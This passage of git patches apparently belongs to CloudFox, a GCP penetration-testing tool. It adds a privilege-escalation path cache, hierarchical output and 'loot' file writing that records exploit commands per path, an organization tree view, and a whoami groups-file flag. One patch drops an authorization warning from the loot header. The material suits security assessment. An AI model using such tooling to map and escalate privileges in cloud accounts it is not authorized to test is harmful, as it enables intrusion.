"GetServiceAccountAccessToken" + RiskLevel string // "CRITICAL", "HIGH", "MEDIUM" + Target string // What the method targets + Permissions []string // Permissions that enable this method +} + +// NewPrivescCache creates a new empty privesc cache +func NewPrivescCache() *PrivescCache { + return &PrivescCache{ + ServiceAccountPrivesc: make(map[string][]PrivescMethod), + PrincipalPrivesc: make(map[string][]PrivescMethod), + Populated: false, + } +} + +// AddPrivescPath adds a privilege escalation path to the cache +// principal should be the full member string (e.g., "serviceAccount:sa@project.iam.gserviceaccount.com") +func (c *PrivescCache) AddPrivescPath(principal string, method PrivescMethod) { + c.mu.Lock() + defer c.mu.Unlock() + + // Add to principal map + c.PrincipalPrivesc[principal] = append(c.PrincipalPrivesc[principal], method) + + // If it's a service account, also add to the SA-specific map + if strings.HasPrefix(principal, "serviceAccount:") { + email := strings.TrimPrefix(principal, "serviceAccount:") + c.ServiceAccountPrivesc[email] = append(c.ServiceAccountPrivesc[email], method) + } + + // Also check if the principal itself looks like an email (for cleaned member names) + if strings.Contains(principal, "@") && strings.Contains(principal, ".iam.gserviceaccount.com") { + c.ServiceAccountPrivesc[principal] = append(c.ServiceAccountPrivesc[principal], method) + } +} + +// MarkPopulated marks the cache as populated +func (c *PrivescCache) MarkPopulated() { + c.mu.Lock() + defer c.mu.Unlock() + c.Populated = true +} + +// IsPopulated returns whether the cache has been populated +func (c *PrivescCache) IsPopulated() bool { + c.mu.RLock() + defer c.mu.RUnlock() + return c.Populated +} + +// HasPrivesc checks if a service account has any privilege escalation potential +// Returns (hasPrivesc bool, methods []PrivescMethod) +func (c *PrivescCache) HasPrivesc(serviceAccount string) (bool, []PrivescMethod) { + c.mu.RLock() + defer c.mu.RUnlock() + + // Check direct match + if methods, ok := c.ServiceAccountPrivesc[serviceAccount]; ok && len(methods) > 0 { + return true, methods + } + + // Check with serviceAccount: prefix + prefixed := "serviceAccount:" + serviceAccount + if methods, ok := c.PrincipalPrivesc[prefixed]; ok && len(methods) > 0 { + return true, methods + } + + return false, nil +} + +// HasPrivescForPrincipal checks if any principal (user, group, SA) has privesc potential +func (c *PrivescCache) HasPrivescForPrincipal(principal string) (bool, []PrivescMethod) { + c.mu.RLock() + defer c.mu.RUnlock() + + if methods, ok := c.PrincipalPrivesc[principal]; ok && len(methods) > 0 { + return true, methods + } + + return false, nil +} + +// GetPrivescSummary returns a summary string for a service account's privesc potential +// Returns: "Yes (3)" for 3 methods, "No" if none, "-" if cache not populated +func (c *PrivescCache) GetPrivescSummary(serviceAccount string) string { + if !c.IsPopulated() { + return "-" + } + + hasPrivesc, methods := c.HasPrivesc(serviceAccount) + if !hasPrivesc || len(methods) == 0 { + return "No" + } + + return "Yes" +} + +// GetPrivescSummaryWithCount returns a summary string with count +// Returns: "Yes (3)" for 3 methods, "No" if none, "-" if cache not populated +func (c *PrivescCache) GetPrivescSummaryWithCount(serviceAccount string) string { + if !c.IsPopulated() { + return "-" + } + + hasPrivesc, methods := c.HasPrivesc(serviceAccount) + if !hasPrivesc || len(methods) == 0 { + return "No" + } + + // Count unique methods + uniqueMethods := make(map[string]bool) + for _, m := range methods { + uniqueMethods[m.Method] = true + } + + if len(uniqueMethods) == 1 { + return "Yes (1)" + } + return "Yes (" + string(rune('0'+len(uniqueMethods))) + ")" +} + +// GetHighestRiskLevel returns the highest risk level for a service account +// Returns: "CRITICAL", "HIGH", "MEDIUM", or "" if no privesc +func (c *PrivescCache) GetHighestRiskLevel(serviceAccount string) string { + hasPrivesc, methods := c.HasPrivesc(serviceAccount) + if !hasPrivesc { + return "" + } + + riskOrder := map[string]int{"CRITICAL": 3, "HIGH": 2, "MEDIUM": 1, "LOW": 0} + highestRisk := "" + highestOrder := -1 + + for _, m := range methods { + if order, ok := riskOrder[m.RiskLevel]; ok && order > highestOrder { + highestOrder = order + highestRisk = m.RiskLevel + } + } + + return highestRisk +} + +// GetMethodNames returns a list of unique method names for a service account +func (c *PrivescCache) GetMethodNames(serviceAccount string) []string { + hasPrivesc, methods := c.HasPrivesc(serviceAccount) + if !hasPrivesc { + return nil + } + + uniqueMethods := make(map[string]bool) + var result []string + for _, m := range methods { + if !uniqueMethods[m.Method] { + uniqueMethods[m.Method] = true + result = append(result, m.Method) + } + } + + return result +} + +// PrivescPathInfo is a minimal representation of a privesc path for cache population +// This allows the cache to be populated without importing the privescService package +type PrivescPathInfo struct { + Principal string + PrincipalType string + Method string + RiskLevel string + Target string + Permissions []string +} + +// PopulateFromPaths populates the cache from a list of privesc path info +func (c *PrivescCache) PopulateFromPaths(paths []PrivescPathInfo) { + for _, path := range paths { + method := PrivescMethod{ + Method: path.Method, + RiskLevel: path.RiskLevel, + Target: path.Target, + Permissions: path.Permissions, + } + + // Build the full principal string + principal := path.Principal + if path.PrincipalType == "serviceAccount" && !strings.HasPrefix(principal, "serviceAccount:") { + principal = "serviceAccount:" + principal + } else if path.PrincipalType == "user" && !strings.HasPrefix(principal, "user:") { + principal = "user:" + principal + } else if path.PrincipalType == "group" && !strings.HasPrefix(principal, "group:") { + principal = "group:" + principal + } + + c.AddPrivescPath(principal, method) + } + c.MarkPopulated() +} + +// Context key for privesc cache +type privescCacheKey struct{} + +// GetPrivescCacheFromContext retrieves the privesc cache from context +func GetPrivescCacheFromContext(ctx context.Context) *PrivescCache { + if cache, ok := ctx.Value(privescCacheKey{}).(*PrivescCache); ok { + return cache + } + return nil +} + +// SetPrivescCacheInContext returns a new context with the privesc cache +func SetPrivescCacheInContext(ctx context.Context, cache *PrivescCache) context.Context { + return context.WithValue(ctx, privescCacheKey{}, cache) +} diff --git a/internal/output2.go b/internal/output2.go index 3b1929b1..313c9c5a 100644 --- a/internal/output2.go +++ b/internal/output2.go @@ -1102,6 +1102,10 @@ func HandleOutputSmart( // - Organization-level: [O]-{OrgName} or [O]-{OrgID} // - Account-level: [A]-{AccountName} or [A]-{AccountID} // - Project-level: [P]-{ProjectName} or [P]-{ProjectID} +// +// Multi-scope handling: +// - Single scope: [P]{ProjectName} +// - Multiple scopes: [P]{FirstName}_and_{N-1}_more func buildResultsIdentifier(scopeType string, identifiers, names []string) string { var rawName string @@ -1116,6 +1120,12 @@ func buildResultsIdentifier(scopeType string, identifiers, names []string) strin rawName = "unknown-scope" } + // Handle multiple scopes - indicate how many additional scopes are included + // This helps users understand that the folder contains data from multiple projects/accounts + if len(identifiers) > 1 { + rawName = fmt.Sprintf("%s_and_%d_more", rawName, len(identifiers)-1) + } + // Sanitize the name for Windows/Linux compatibility sanitizedName := sanitizeDirectoryName(rawName) @@ -1195,3 +1205,286 @@ func formatNumberWithCommas(n int) string { } return string(result) } + +// ============================================================================ +// HIERARCHICAL OUTPUT FUNCTIONS - GCP multi-project support +// ============================================================================ + +// HierarchicalOutputData represents output data organized by scope for hierarchical output +type HierarchicalOutputData struct { + OrgLevelData map[string]CloudfoxOutput // orgID -> org-level data + ProjectLevelData map[string]CloudfoxOutput // projectID -> project data +} + +// PathBuilder is a function type that builds output paths for hierarchical output +// This allows the caller to inject their path-building logic without importing internal/gcp +type PathBuilder func(scopeType string, scopeID string) string + +// HandleHierarchicalOutput writes data to hierarchical directory structure. +// This function outputs data per-scope (organization and/or project) rather than aggregating all data. +// +// Directory structure: +// - Org level: baseDir/gcp/principal/[O]org-name/module.csv +// - Project under org: baseDir/gcp/principal/[O]org-name/[P]project-name/module.csv +// - Standalone project: baseDir/gcp/principal/[P]project-name/module.csv +// +// Parameters: +// - cloudProvider: "gcp" (or other cloud providers in future) +// - format: Output format ("all", "csv", "json", "table") +// - verbosity: Verbosity level for console output +// - wrap: Whether to wrap table output +// - pathBuilder: Function that returns the output path for a given scope +// - outputData: Data organized by scope (org-level and project-level maps) +func HandleHierarchicalOutput( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Write org-level data (if any) + for orgID, orgData := range outputData.OrgLevelData { + outPath := pathBuilder("organization", orgID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, orgData, logger); err != nil { + return fmt.Errorf("failed to write org-level output for %s: %w", orgID, err) + } + } + + // Write project-level data + for projectID, projectData := range outputData.ProjectLevelData { + outPath := pathBuilder("project", projectID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, projectData, logger); err != nil { + return fmt.Errorf("failed to write project-level output for %s: %w", projectID, err) + } + } + + return nil +} + +// writeOutputToPath writes CloudfoxOutput data to a specific path +func writeOutputToPath(outPath string, format string, verbosity int, wrap bool, data CloudfoxOutput, logger Logger) error { + tables := data.TableFiles() + lootFiles := data.LootFiles() + + // Determine base module name from first table file (for logging) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// HandleHierarchicalOutputStreaming writes data to hierarchical directory structure using streaming. +// This is the memory-efficient version for large datasets. +// +// Parameters are the same as HandleHierarchicalOutput but uses streaming internally. +func HandleHierarchicalOutputStreaming( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Stream org-level data (if any) + for orgID, orgData := range outputData.OrgLevelData { + outPath := pathBuilder("organization", orgID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, orgData, logger); err != nil { + return fmt.Errorf("failed to stream org-level output for %s: %w", orgID, err) + } + } + + // Stream project-level data + for projectID, projectData := range outputData.ProjectLevelData { + outPath := pathBuilder("project", projectID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, projectData, logger); err != nil { + return fmt.Errorf("failed to stream project-level output for %s: %w", projectID, err) + } + } + + return nil +} + +// streamOutputToPath streams CloudfoxOutput data to a specific path +func streamOutputToPath(outPath string, format string, verbosity int, wrap bool, data CloudfoxOutput, logger Logger) error { + if err := os.MkdirAll(outPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // Determine base module name from first table file (for logging) + baseCloudfoxModule := "" + if len(data.TableFiles()) > 0 { + baseCloudfoxModule = data.TableFiles()[0].Name + } + + // Stream table files + for _, t := range data.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + csvFile.Close() + + logger.InfoM(fmt.Sprintf("Output written to %s", csvPath), baseCloudfoxModule) + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + + // Stream table rows + if format == "all" || format == "table" { + tableDir := filepath.Join(outPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + tablePath := filepath.Join(tableDir, safeName+".txt") + + tableFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open table file: %w", err) + } + + // Write tab-delimited data + _, _ = fmt.Fprintln(tableFile, strings.Join(t.Header, "\t")) + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = fmt.Fprintln(tableFile, strings.Join(cleanRow, "\t")) + } + tableFile.Close() + + logger.InfoM(fmt.Sprintf("Output written to %s", tablePath), baseCloudfoxModule) + } + } + + // Stream loot files + for _, l := range data.LootFiles() { + lootDir := filepath.Join(outPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := lootFile.WriteString(scanner.Text() + "\n"); err != nil { + lootFile.Close() + return fmt.Errorf("failed to append loot line: %w", err) + } + } + lootFile.Close() + + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + + return nil +} + +// HandleHierarchicalOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for hierarchical output. +func HandleHierarchicalOutputSmart( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Count total rows across all data + totalRows := 0 + for _, orgData := range outputData.OrgLevelData { + for _, tableFile := range orgData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + for _, projectData := range outputData.ProjectLevelData { + for _, tableFile := range projectData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Hierarchical output - Total dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("Large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming hierarchical output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + return HandleHierarchicalOutputStreaming(cloudProvider, format, verbosity, wrap, pathBuilder, outputData) + } + + // Use normal in-memory output for smaller datasets + return HandleHierarchicalOutput(cloudProvider, format, verbosity, wrap, pathBuilder, outputData) +} From 31e2fe5fcb8f1fe620e265265ebd10bad9a33232 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Wed, 14 Jan 2026 15:25:47 -0500 Subject: [PATCH 15/48] fixed privesc execution and output issues --- cli/gcp.go | 37 +++++++++++++++++++++++-------------- gcp/commands/privesc.go | 26 ++++++++++++++++++++++++++ 2 files changed, 49 insertions(+), 14 deletions(-) diff --git a/cli/gcp.go b/cli/gcp.go index fee8d8d8..29124282 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -207,18 +207,30 @@ var GCPAllChecksCommand = &cobra.Command{ startTime := time.Now() ctx := cmd.Context() - // Run privesc analysis first and populate cache for other modules - GCPLogger.InfoM("Running privilege escalation analysis first to populate cache...", "all-checks") - privescCache := runPrivescAndPopulateCache(ctx) - if privescCache != nil && privescCache.IsPopulated() { - // Store cache in context for other modules to use - ctx = gcpinternal.SetPrivescCacheInContext(ctx, privescCache) - cmd.SetContext(ctx) - GCPLogger.SuccessM("Privesc cache populated - other modules will show Priv Esc column", "all-checks") - } else { - GCPLogger.InfoM("Privesc analysis not available - Priv Esc column will show '-'", "all-checks") + // Find the privesc command to run first + var privescCmd *cobra.Command + for _, childCmd := range GCPCommands.Commands() { + if childCmd.Use == "privesc" { + privescCmd = childCmd + break + } + } + + // Run privesc command first (produces output) and populate cache for other modules + if privescCmd != nil { + GCPLogger.InfoM("Running privilege escalation analysis first...", "all-checks") + privescCmd.Run(cmd, args) + executedModules = append(executedModules, "privesc") + + // After running privesc, populate cache from the analysis for other modules + privescCache := runPrivescAndPopulateCache(ctx) + if privescCache != nil && privescCache.IsPopulated() { + ctx = gcpinternal.SetPrivescCacheInContext(ctx, privescCache) + cmd.SetContext(ctx) + GCPLogger.SuccessM("Privesc cache populated - other modules will show Priv Esc column", "all-checks") + } + GCPLogger.InfoM("", "all-checks") } - GCPLogger.InfoM("", "all-checks") // Count total modules to execute (excluding self, hidden, and privesc which we already ran) var modulesToRun []*cobra.Command @@ -239,9 +251,6 @@ var GCPAllChecksCommand = &cobra.Command{ GCPLogger.InfoM(fmt.Sprintf("Starting execution of %d modules...", totalModules), "all-checks") GCPLogger.InfoM("", "all-checks") - // Add privesc to executed list since we ran it first - executedModules = append(executedModules, "privesc") - for i, childCmd := range modulesToRun { GCPLogger.InfoM(fmt.Sprintf("[%d/%d] Running: %s", i+1, totalModules, childCmd.Use), "all-checks") childCmd.Run(cmd, args) diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 72ca2018..03c812b0 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -110,6 +110,32 @@ func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { m.OrgNames = result.OrgNames m.FolderNames = result.FolderNames + // Update hierarchy with discovered org names so path builder uses display names + if m.Hierarchy != nil && len(m.OrgIDs) > 0 { + for _, orgID := range m.OrgIDs { + orgName := m.OrgNames[orgID] + // Check if org exists in hierarchy and update display name if needed + found := false + for i := range m.Hierarchy.Organizations { + if m.Hierarchy.Organizations[i].ID == orgID { + if orgName != "" && m.Hierarchy.Organizations[i].DisplayName == "" { + m.Hierarchy.Organizations[i].DisplayName = orgName + } + found = true + break + } + } + // If org not in hierarchy, add it + if !found && orgName != "" { + m.Hierarchy.Organizations = append(m.Hierarchy.Organizations, gcpinternal.OrgScope{ + ID: orgID, + DisplayName: orgName, + Accessible: true, + }) + } + } + } + // Organize project paths by project ID for _, path := range result.ProjectPaths { if path.ScopeType == "project" && path.ScopeID != "" { From eedf397c93c962056c98ffdb876f16d374691e20 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 15 Jan 2026 08:02:49 -0500 Subject: [PATCH 16/48] created beautified ASCII tree view of the organization hierarchy --- gcp/commands/organizations.go | 181 +++++++++++++++++++++++++++------- gcp/commands/privesc.go | 43 ++------ gcp/commands/whoami.go | 59 ++++++++--- 3 files changed, 197 insertions(+), 86 deletions(-) diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index 37fcc22d..864c32f6 100644 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -136,35 +136,17 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge func (m *OrganizationsModule) initializeLootFiles() { m.LootMap["organizations-commands"] = &internal.LootFile{ Name: "organizations-commands", - Contents: "# GCP Organization Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + Contents: "# GCP Organization Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["organizations-map"] = &internal.LootFile{ + Name: "organizations-map", + Contents: "", } } func (m *OrganizationsModule) generateLoot() { - // Hierarchy visualization - m.LootMap["organizations-commands"].Contents += "# ==========================================\n" - m.LootMap["organizations-commands"].Contents += "# ORGANIZATION HIERARCHY\n" - m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" - - for _, org := range m.Organizations { - orgID := strings.TrimPrefix(org.Name, "organizations/") - m.LootMap["organizations-commands"].Contents += fmt.Sprintf("Organization: %s (%s)\n", org.DisplayName, orgID) - - // Find folders directly under this org - for _, folder := range m.Folders { - if folder.Parent == org.Name { - m.addFolderToHierarchy(folder, 1) - } - } - - // Find projects directly under this org - for _, proj := range m.Projects { - if proj.Parent == org.Name { - m.LootMap["organizations-commands"].Contents += fmt.Sprintf(" └── Project: %s (%s)\n", proj.DisplayName, proj.ProjectID) - } - } - m.LootMap["organizations-commands"].Contents += "\n" - } + // Generate beautified tree view (org map) + m.generateTreeView() // Gcloud commands for organizations m.LootMap["organizations-commands"].Contents += "# ==========================================\n" @@ -211,24 +193,153 @@ func (m *OrganizationsModule) generateLoot() { } } -func (m *OrganizationsModule) addFolderToHierarchy(folder orgsservice.FolderInfo, depth int) { - indent := strings.Repeat(" ", depth) +// generateTreeView creates a beautified ASCII tree of the organization hierarchy +func (m *OrganizationsModule) generateTreeView() { + tree := &m.LootMap["organizations-map"].Contents + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + displayName := org.DisplayName + if displayName == "" { + displayName = orgID + } + *tree += fmt.Sprintf("Organization: %s (%s)\n", displayName, orgID) + + // Get direct children (folders and projects) of this org + childFolders := m.getChildFolders(org.Name) + childProjects := m.getChildProjects(org.Name) + + totalChildren := len(childFolders) + len(childProjects) + childIndex := 0 + + // Add folders + for _, folder := range childFolders { + childIndex++ + isLast := childIndex == totalChildren + m.addFolderToTree(tree, folder, "", isLast) + } + + // Add projects directly under org + for _, proj := range childProjects { + childIndex++ + isLast := childIndex == totalChildren + prefix := "├── " + if isLast { + prefix = "└── " + } + displayName := proj.DisplayName + if displayName == "" { + displayName = proj.ProjectID + } + *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, displayName, proj.ProjectID) + } + + *tree += "\n" + } + + // Handle standalone projects (no org parent) + standaloneProjects := m.getStandaloneProjects() + if len(standaloneProjects) > 0 { + *tree += "Standalone Projects (no organization):\n" + for i, proj := range standaloneProjects { + isLast := i == len(standaloneProjects)-1 + prefix := "├── " + if isLast { + prefix = "└── " + } + displayName := proj.DisplayName + if displayName == "" { + displayName = proj.ProjectID + } + *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, displayName, proj.ProjectID) + } + } +} + +// addFolderToTree recursively adds a folder and its children to the tree +func (m *OrganizationsModule) addFolderToTree(tree *string, folder orgsservice.FolderInfo, indent string, isLast bool) { folderID := strings.TrimPrefix(folder.Name, "folders/") - m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s├── Folder: %s (%s)\n", indent, folder.DisplayName, folderID) + displayName := folder.DisplayName + if displayName == "" { + displayName = folderID + } + + // Determine the prefix for this item + prefix := "├── " + if isLast { + prefix = "└── " + } + + *tree += fmt.Sprintf("%s%sFolder: %s (%s)\n", indent, prefix, displayName, folderID) + + // Determine the indent for children + childIndent := indent + "│ " + if isLast { + childIndent = indent + " " + } + + // Get children of this folder + childFolders := m.getChildFolders(folder.Name) + childProjects := m.getChildProjects(folder.Name) + + totalChildren := len(childFolders) + len(childProjects) + childIndex := 0 - // Find child folders - for _, childFolder := range m.Folders { - if childFolder.Parent == folder.Name { - m.addFolderToHierarchy(childFolder, depth+1) + // Add child folders + for _, childFolder := range childFolders { + childIndex++ + childIsLast := childIndex == totalChildren + m.addFolderToTree(tree, childFolder, childIndent, childIsLast) + } + + // Add child projects + for _, proj := range childProjects { + childIndex++ + childIsLast := childIndex == totalChildren + childPrefix := "├── " + if childIsLast { + childPrefix = "└── " + } + displayName := proj.DisplayName + if displayName == "" { + displayName = proj.ProjectID + } + *tree += fmt.Sprintf("%s%sProject: %s (%s)\n", childIndent, childPrefix, displayName, proj.ProjectID) + } +} + +// getChildFolders returns folders that are direct children of the given parent +func (m *OrganizationsModule) getChildFolders(parentName string) []orgsservice.FolderInfo { + var children []orgsservice.FolderInfo + for _, folder := range m.Folders { + if folder.Parent == parentName { + children = append(children, folder) } } + return children +} + +// getChildProjects returns projects that are direct children of the given parent +func (m *OrganizationsModule) getChildProjects(parentName string) []orgsservice.ProjectInfo { + var children []orgsservice.ProjectInfo + for _, proj := range m.Projects { + if proj.Parent == parentName { + children = append(children, proj) + } + } + return children +} - // Find projects under this folder +// getStandaloneProjects returns projects that don't belong to any organization +func (m *OrganizationsModule) getStandaloneProjects() []orgsservice.ProjectInfo { + var standalone []orgsservice.ProjectInfo for _, proj := range m.Projects { - if proj.Parent == folder.Name { - m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s └── Project: %s (%s)\n", indent, proj.DisplayName, proj.ProjectID) + // Check if parent is not an org or folder + if !strings.HasPrefix(proj.Parent, "organizations/") && !strings.HasPrefix(proj.Parent, "folders/") { + standalone = append(standalone, proj) } } + return standalone } // ------------------------------ diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 03c812b0..1b52908f 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -110,32 +110,6 @@ func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { m.OrgNames = result.OrgNames m.FolderNames = result.FolderNames - // Update hierarchy with discovered org names so path builder uses display names - if m.Hierarchy != nil && len(m.OrgIDs) > 0 { - for _, orgID := range m.OrgIDs { - orgName := m.OrgNames[orgID] - // Check if org exists in hierarchy and update display name if needed - found := false - for i := range m.Hierarchy.Organizations { - if m.Hierarchy.Organizations[i].ID == orgID { - if orgName != "" && m.Hierarchy.Organizations[i].DisplayName == "" { - m.Hierarchy.Organizations[i].DisplayName = orgName - } - found = true - break - } - } - // If org not in hierarchy, add it - if !found && orgName != "" { - m.Hierarchy.Organizations = append(m.Hierarchy.Organizations, gcpinternal.OrgScope{ - ID: orgID, - DisplayName: orgName, - Accessible: true, - }) - } - } - } - // Organize project paths by project ID for _, path := range result.ProjectPaths { if path.ScopeType == "project" && path.ScopeID != "" { @@ -185,18 +159,16 @@ func (m *PrivescModule) addPathToLoot(path privescservice.PrivescPath) { } lootFile.Contents += fmt.Sprintf( - "# Method: %s [%s]\n"+ + "# Method: %s\n"+ "# Principal: %s (%s)\n"+ "# Scope: %s\n"+ "# Target: %s\n"+ - "# Risk Level: %s\n"+ "# Permissions: %s\n"+ "%s\n\n", - path.Method, path.RiskLevel, + path.Method, path.Principal, path.PrincipalType, scopeInfo, path.TargetResource, - path.RiskLevel, strings.Join(path.Permissions, ", "), path.ExploitCommand, ) @@ -218,7 +190,6 @@ func (m *PrivescModule) getHeader() []string { "Source Principal", "Source Principal Type", "Action (Method)", - "Risk Level", "Target Resource", "Permissions", } @@ -239,7 +210,6 @@ func (m *PrivescModule) pathsToTableBody(paths []privescservice.PrivescPath) [][ path.Principal, path.PrincipalType, path.Method, - path.RiskLevel, path.TargetResource, strings.Join(path.Permissions, ", "), }) @@ -288,12 +258,13 @@ func (m *PrivescModule) writeHierarchicalOutput(ctx context.Context, logger inte ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Determine org ID - prefer discovered orgs, fall back to hierarchy + // Determine org ID - prefer hierarchy (for consistent output paths across modules), + // fall back to discovered orgs if hierarchy doesn't have org info orgID := "" - if len(m.OrgIDs) > 0 { - orgID = m.OrgIDs[0] - } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { orgID = m.Hierarchy.Organizations[0].ID + } else if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] } if orgID != "" { diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 728ca7a1..d76b253d 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -21,6 +21,7 @@ import ( // Flags for whoami command var whoamiExtended bool var whoamiGroups []string +var whoamiGroupsFile string var GCPWhoAmICommand = &cobra.Command{ Use: globals.GCP_WHOAMI_MODULE_NAME, @@ -41,13 +42,19 @@ With --extended flag (adds): With --groups flag: - Provide known group email addresses when group enumeration is permission denied - Role bindings from these groups will be included in the output -- Use comma-separated list: --groups=group1@domain.com,group2@domain.com`, +- Use comma-separated list: --groups=group1@domain.com,group2@domain.com + +With --groupslist flag: +- Import groups from a file (one group per line) +- Same behavior as --groups but reads from file +- Example: --groupslist=groups.txt`, Run: runGCPWhoAmICommand, } func init() { GCPWhoAmICommand.Flags().BoolVarP(&whoamiExtended, "extended", "e", false, "Enable extended enumeration (impersonation targets, privilege escalation paths)") GCPWhoAmICommand.Flags().StringSliceVarP(&whoamiGroups, "groups", "g", []string{}, "Comma-separated list of known group email addresses (used when group enumeration is permission denied)") + GCPWhoAmICommand.Flags().StringVar(&whoamiGroupsFile, "groupslist", "", "Path to file containing group email addresses (one per line)") } // ------------------------------ @@ -114,7 +121,6 @@ type ImpersonationTarget struct { type PrivilegeEscalationPath struct { Name string Description string - Risk string // CRITICAL, HIGH, MEDIUM Command string } @@ -156,6 +162,13 @@ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { return } + // Combine groups from --groups flag and --groupslist file + allGroups := whoamiGroups + if whoamiGroupsFile != "" { + fileGroups := internal.LoadFileLinesIntoArray(whoamiGroupsFile) + allGroups = append(allGroups, fileGroups...) + } + // Create module instance module := &WhoAmIModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), @@ -165,7 +178,7 @@ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { DangerousPermissions: []string{}, LootMap: make(map[string]*internal.LootFile), Extended: whoamiExtended, - ProvidedGroups: whoamiGroups, + ProvidedGroups: allGroups, } // Initialize loot files @@ -331,8 +344,34 @@ func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger intern } } +// normalizeGroupEmail ensures group has full email format +// If group doesn't contain @, tries to infer domain from identity email +func (m *WhoAmIModule) normalizeGroupEmail(group string) string { + if strings.Contains(group, "@") { + return group + } + + // Try to infer domain from identity email + if m.Identity.Email != "" && strings.Contains(m.Identity.Email, "@") { + parts := strings.SplitN(m.Identity.Email, "@", 2) + if len(parts) == 2 { + return group + "@" + parts[1] + } + } + + // Return 